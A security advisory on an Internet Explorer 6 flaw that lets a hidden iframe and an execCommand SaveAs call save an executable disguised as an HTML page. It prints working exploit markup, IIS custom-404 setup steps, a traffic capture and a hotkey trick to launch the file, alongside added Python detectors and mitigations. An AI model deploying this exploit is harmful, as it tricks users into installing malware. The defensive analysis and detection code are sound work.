Microsoft Internet Explorer (including IE for Windows XP SP2) is reported to be vulnerable to a file download security warning bypass. This unpatched flaw may be exploited to download a malicious executable file masqueraded as an HTML file.
Credit:
The information has been provided by Cyber flash A.K.A Vengy and K-OTiK team.
The original article can be found at: http://www.k-otik.com/exploits/20041119.IESP2disclosure.php
Original exploit code can be found at: http://www.k-otik.com/exploits/20041119.IESP2Unpatched.php
Vulnerable Systems:
* Internet Explorer version 6
When your browser cannot locate the URL that you entered in the address bar, you receive a 404 error message telling you that the file was not found. The exploit described below uses a custom HTTP 404 error message (v.exe) which is fed to the execCommand method, which in turn executes the file without warning. The only user input required is for the user to accept a prompt asking him to "Save an HTML Document".
1. Bypasses the "File Download - Security Warning".
Each time you click a download link, Windows XP pops up a "File Download - Security Warning", making you aware that Windows is downloading a program. In addition Windows XP will ask for your permission to complete the download process.
2. Bypasses the "Open File - Security Warning".
Launching a downloaded executable that originates from an untrusted location (zone) such as the Internet will bring up an "Open File - Security Warning" that asks you for permission to run the file.
The execCommand Method:
The execCommand method executes a command on the current document. One of the many parameters of this method is the SaveAs Command that saves the current Web page to a local file. The SaveAs Command has the following format: document.execCommand('SaveAs', '1', 'Name of the webpage.htm');
How does it work? (Exploit):
Notice that you didn't receive any warning messages such as: "File Download - Security Warning" or "Open File - Security Warning".
In addition, if "Hide file extensions for known file types" (Tools->Folder Options...->View) is enabled (i.e., 'funny joke.exe' appears as 'funny joke'), it is possible to trick a user into downloading a malicious executable file by masquerading it as an HTML document (Windows XP SP2 would normally prevent the direct download, but in our case it doesn't).
The following code requires no special server setup, and should work from any web page that IE 6.0 downloads:
<html>
<body>
<iframe src='http://domain.com/v.exe?.htm' name="NotFound" width="0" height="0"></iframe>Click
<a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">
here</a>.
</body>
</html>
In addition, here's an example that requires modifying the IIS Error Mapping Properties (see below):
Steps to configure IIS:
Launch Internet Information Services manager. Under the 'Custom Errors' tab, modify the Error Mapping Properties as follows:
* Error Code: 404
* Default Text: Not Found
* Message Type: URL
* URL: /v.exe (name of the executable)
Within the HTML page, insert an IFRAME as follows:
<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>
The file 'vengy404.htm' intentionally doesn't exist on the server, so it will trigger a 404 error message as defined above. But, the JavaScript code below references the stealthy v.exe data within the frame 'NotFound' and is linked to 'funny joke.exe' when prompted to save the file:
javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');
Entire code sample for the 404 error page:
<html>
<body>
<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>Click
<a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">
here</a>.
</body>
</html>
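Both samples above share the same two indicators: a hidden iframe whose source is an executable dressed up with a document-looking query string (v.exe?.htm), and a SaveAs call on that frame targeting an executable filename. The following content-inspection routine, added here as an example and not part of the original advisory, scans page markup for that combination; the indicator names and the benign comparison page are my own constructions.

```python
import re

# Constructed sample: the masqueraded-download markup from this advisory,
# beside a benign page that saves a real document and should not be flagged.
SUSPECT_HTML = """<html><body>
<iframe src='http://domain.com/v.exe?.htm' name="NotFound" width="0" height="0"></iframe>Click
<a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">
here</a>.</body></html>"""

BENIGN_HTML = """<html><body>
<iframe src='https://example.com/widget.htm' width="300" height="200"></iframe>
<a href="report.htm" onclick="document.execCommand('SaveAs',1,'report.htm');">save</a>
</body></html>"""

EXECUTABLE_EXT = r"\.(?:exe|scr|com|pif|bat|cmd)"

# iframe whose src path ends in an executable while its query string ends in
# .htm/.html, the exact spelling IE 6 mishandled (v.exe?.htm)
IFRAME_MASQUERADE = re.compile(
    r"""<iframe[^>]*\bsrc=['"]?[^'" >]*?""" + EXECUTABLE_EXT + r"""\?[^'" >]*\.html?['" >]""",
    re.IGNORECASE)
# SaveAs whose suggested filename carries an executable extension
SAVEAS_EXECUTABLE = re.compile(
    r"""execCommand\(\s*['"]SaveAs['"]\s*,[^)]*?['"][^'"]*""" + EXECUTABLE_EXT + r"""['"]\s*\)""",
    re.IGNORECASE)
# 0x0 iframe, the usual way to keep the frame out of sight
HIDDEN_IFRAME = re.compile(
    r"""<iframe[^>]*\bwidth=['"]?0['"]?[^>]*\bheight=['"]?0['"]?""", re.IGNORECASE)


def find_masquerade_indicators(html: str) -> list[str]:
    """Return the names of the indicators present in the page markup."""
    hits = []
    if IFRAME_MASQUERADE.search(html):
        hits.append("iframe-exe-masqueraded-as-htm")
    if SAVEAS_EXECUTABLE.search(html):
        hits.append("execCommand-saveas-executable")
    if HIDDEN_IFRAME.search(html):
        hits.append("hidden-iframe")
    return hits


def is_masqueraded_download(html: str) -> bool:
    """Flag only when the masqueraded frame and the SaveAs-to-executable coexist."""
    hits = set(find_masquerade_indicators(html))
    return {"iframe-exe-masqueraded-as-htm", "execCommand-saveas-executable"} <= hits
```

A hidden iframe alone is common on legitimate pages, which is why the verdict requires the two page-specific indicators together.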
Breakdown of the TCP stream from Internet Explorer to IIS:
Here's what occurs internally when fetching the exploit web page plus the 404 error message (v.exe).
GET /// HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 16 Nov 2004 02:34:44 GMT
If-None-Match: "7e5914d584cbc41:10d2"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: insecure.hopto.org:53
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Server: Microsoft-IIS/5.1
Date: Tue, 16 Nov 2004 12:31:00 GMT
Content-Location: http://insecure.hopto.org:53/index.htm
ETag: "7e5914d584cbc41:10d2"
Content-Length: 0
GET ///vengy404.htm HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: insecure.hopto.org:53
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Cache-Control: no-cache,no-transform
Expires: Tue, 16 Nov 2004 12:31:00 GMT
Content-Location: http://insecure.hopto.org:53/v.exe?404;http://insecure.hopto.org///vengy404.htm
Vary: *
Date: Tue, 16 Nov 2004 12:31:00 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 91408
<---V.EXE binary data goes here --->
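The captured exchange gives a proxy or IDS three things to key on: a request for a .htm URL answered 200 with application/octet-stream, a Content-Location whose path is an executable, and the "404;" marker IIS prepends to the query when it serves a custom error from a mapped URL. The checker below, added here as an example rather than code from the advisory, parses a request/response pair and reports those conditions; the two captures are constructed from the headers shown above, trimmed to the relevant fields.

```python
# Constructed sample, modelled on the capture in this advisory: a request for a
# non-existent .htm that IIS answers with the custom-404 executable body.
EXCHANGE = """GET ///vengy404.htm HTTP/1.1
Host: insecure.hopto.org:53

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Content-Location: http://insecure.hopto.org:53/v.exe?404;http://insecure.hopto.org///vengy404.htm
Content-Type: application/octet-stream
Content-Length: 91408
"""

# Constructed benign exchange: an ordinary HTML page, nothing to report.
BENIGN_EXCHANGE = """GET /index.htm HTTP/1.1
Host: www.example.com

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Content-Type: text/html
Content-Length: 512
"""

DOC_EXTS = (".htm", ".html")
EXE_EXTS = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd")


def parse_message(block: str):
    """Split one HTTP message into (start line, {lowercased header: value})."""
    lines = block.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")   # only the first colon separates name/value
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def check_exchange(capture: str) -> list[str]:
    """Return the reasons this request/response pair looks like a 404-to-executable swap."""
    req_block, _, resp_block = capture.partition("\n\n")
    req_line, _ = parse_message(req_block)
    status_line, resp = parse_message(resp_block)
    req_path = req_line.split()[1].split("?")[0].lower()
    status = status_line.split()[1]
    ctype = resp.get("content-type", "").split(";")[0].strip().lower()
    cloc_path, _, cloc_query = resp.get("content-location", "").partition("?")
    reasons = []
    if req_path.endswith(DOC_EXTS) and status == "200" and ctype == "application/octet-stream":
        reasons.append("document URL answered with a binary body")
    if cloc_path.lower().endswith(EXE_EXTS):
        reasons.append("Content-Location points at an executable")
    if cloc_query.startswith("404;"):
        reasons.append("Content-Location carries IIS custom-error marker 404;")
    return reasons
```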
Solution:
Disable Active Scripting and the "Hide file extensions for known file types" option
[Tools->Folder Options-> View]
Conclusion:
Overall, IE attempts to intercept risky content and prompts with a security warning, but it seems to allow custom HTTP errors to pass through those security checks.
Also, by creating a 404 .lnk shortcut file with a hotkey of 'Enter', saving it to the desktop installs a global hotkey, so it may be possible to execute the downloaded file simply by getting the user to press the Enter key, e.g. with alert('Thanks. Press Return').
Funny and scary how a few well placed characters <iframe src='v.exe?.htm' .... can confuse the IE monster, whereas specifying <iframe src='v.exe' .... is handled correctly!
Subject: How can I save *.html for Mozilla/Netscape/Opera
Date: 22 Dec. 2005
From: imthiyazmail.cyberneme.com
The document.execCommand works well for IE 6, but not for Mozilla; please send the code for Mozilla/Netscape/Opera.
Warm Regards,
Imthiyaz